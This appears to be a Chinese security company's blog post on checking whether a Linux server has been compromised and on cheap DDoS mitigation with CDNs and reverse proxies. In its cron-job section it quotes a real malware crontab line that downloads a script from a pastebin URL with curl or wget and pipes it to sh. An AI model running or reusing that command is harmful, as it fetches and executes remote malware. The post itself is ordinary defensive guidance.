很多客户网站服务器被入侵，被攻击，找到我们SINE安全公司寻求技术支持与帮助，有些网站被篡改，被跳转，首页内容被替换，服务器植入木马后门，服务器卡顿，服务器异常网络连接，s是需要立即处理的，降损失降到最低，让网站恢复正常的访问，由于每个客户找到我们SINE安全都是比较着急的，安全的处理时间也需要尽快的处理，根据我们的处理经验，我们总结了一些服务器被攻击，被黑的排查办法，专门用来检查服务器第一时间的安全问题，看发生在哪里，服务器是否被黑，是否被攻击，那些被篡改等等。

如何排查服务器被攻击？

首先我们会对当前服务器的IP，以及IP的地址，linux服务器名称，服务器的版本是centos,还是redhat，服务器的当前时间，进行收集并记录到一个txt文档里，接下来再执行下一步，对当前服务器的异常网络连接以及异常的系统进程检查，主要是通过netstat -an以及-antp命令来检查服务器存在哪些异常的IP连接。并对连接的IP，进行归属地查询，如果是国外的IP，直接记录当前进程的PID值，并自动将PID的所有信息记录，查询PID所在的linux文件地址，紧接着检查当前占用CPU大于百分之30的进程，并检查该进程所在的文件夹。

在我们处理客户服务器被攻击的时候发现很多服务器的命令被篡改，比如正常的PS查看进程的，查询目录的 cd的命令都给篡改了，让服务器无法正常使用命令，检查服务器安全造成了困扰。对服务器的启动项进行检查，有些服务器被植入木马后门，即使重启服务器也还是被攻击，木马会自动的启动，检查linux的init.d的文件夹里是否有多余的启动文件，也可以检查时间，来判断启动项是否有问题。

再一个要检查的地方是服务器的历史命令，history很多服务器被黑都会留下痕迹，比如SSH登录服务器后，攻击者对服务器进行了操作，执行了那些恶意命令都可以通过history查询的到，有没有使用wget命令下载木马，或者执行SH文件。检查服务器的所有账号，以及当前使用并登录的管理员账户，tty是本地用户登录，pst是远程连接的用户登录，来排查服务器是否被黑，被攻击，也可以检查login.defs文件的uid值，判断uid的passwd来获取最近新建的管理员账户。执行cat etc/passwd命令检查是否存在异常的用户账户，包括特权账户，UID值为0.

最重要的是检查服务器的定时任务，前段时间某网站客户中了挖矿病毒，一直占用CPU，查看了定时任务发现每15分钟自动执行下载命令，crontab -l */15 * * * * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q-O- https://pastebin.com/raw/TS4NeUnd)|sh 代码如上，自动下载并执行SH木马文件。定时任务删都删不掉，最后通过检查系统文件查到了木马，并终止进程，强制删除。有些服务器被黑后，请立即检查2天里被修改的文件，可以通过find命令去检查所有的文件，看是否有木马后门文件，如果有可以确定服务器被黑了。

如果以上方法认为解决，尝试下面的方法

备份用户数据

在服务器遭受攻击后，需要立刻备份服务器上的用户数据，同时也要查看这些数据中是否隐藏着攻击源。如果攻击源在用户数据中，一定要彻底删除，然后将用户数据备份到一个安全的地方。

重新安装系统

永远不要认为自己能彻底清除攻击源，因为没有人能比黑客更了解攻击程序，在服务器遭到攻击后，最安全也最简单的方法就是重新安装系统，因为大部分攻击程序都会依附在系统文件或者内核中，所以重新安装系统才能彻底清除攻击源。

修复程序或系统漏洞

在发现系统漏洞或者应用程序漏洞后，首先要做的就是修复系统漏洞或者更改程序bug，因为只有将程序的漏洞修复完毕才能正式在服务器上运行。

如果是DOOS攻击

1.对于低成本的应对方法，我给出几个建议。

挂cdn隐藏IP，在换成新的ip后，请务必挂cdn对真实的ip进行隐藏，这样无论怎样被攻击，cdn都可以为你进行抵御。

2.cdn还可以不止套一层，可以多层一起嵌套，网络上免费的也不少。

准备多个服务器做反向代理（配置可以不高能运行nginx就行，最好是那种空路由时间短的），每个反向代理服务器都指向主服务器节点，都绑定一个二级域名，都挂上不同的cdn。

3.主域名可以随时解析到任意一个反向代理服务器，并且可以挂免费的云监控来实时知晓状态，一个节点死了改解析就行。

4.在防火墙层面禁止所有的国外ip（这是大部分肉鸡主要来源），可以很好的降低攻击流量。

以上是比较简单，低成本的方法，如果资金充足的话，建议购买高防IP和高防CDN等防御产品，这样针对不同场景不同的环节也有针对性的防御方案，无法一概而论，当然也看您遇到的对手是什么样的级别。

因此，避免服务器遭受ddos攻击的最好是方式就是说 把高防CDN布置在好，不能让另一方 了解 你的源服务器ip ，即便 高防cdn 其中一个节点被打死 ，还可以立即切换到其他备用节点上。